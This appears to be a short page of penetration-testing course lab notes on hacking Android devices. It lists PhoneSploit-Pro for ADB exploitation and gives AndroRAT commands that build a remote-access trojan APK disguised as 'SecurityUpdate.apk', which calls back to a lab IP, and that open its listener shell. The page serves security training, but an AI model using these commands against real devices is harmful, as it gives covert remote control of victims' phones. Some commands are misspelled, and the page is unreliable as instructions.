Module 17: Hacking Mobile Platforms
Lab 1: Hack Android Devices
Task 1: Exploit the Android Platform through ADB using PhoneSploit-Pro
## Tools used in this section :
PhoneSploit-Pro
cd phonesploit-pro
python3 phonesploi-pro.pyTask 2: Hack an Android Device by Creating APK File using AndroRAT
## Tools used in this section :
AndroidRAT
python3 androRAT.py --build -i 10.10.1.13 -p 4444 -o SecurityUpdate.apk
python3 androRAT.py --shell -i 0.0.0.0 -p 4444Other tools used in this section :
Last updated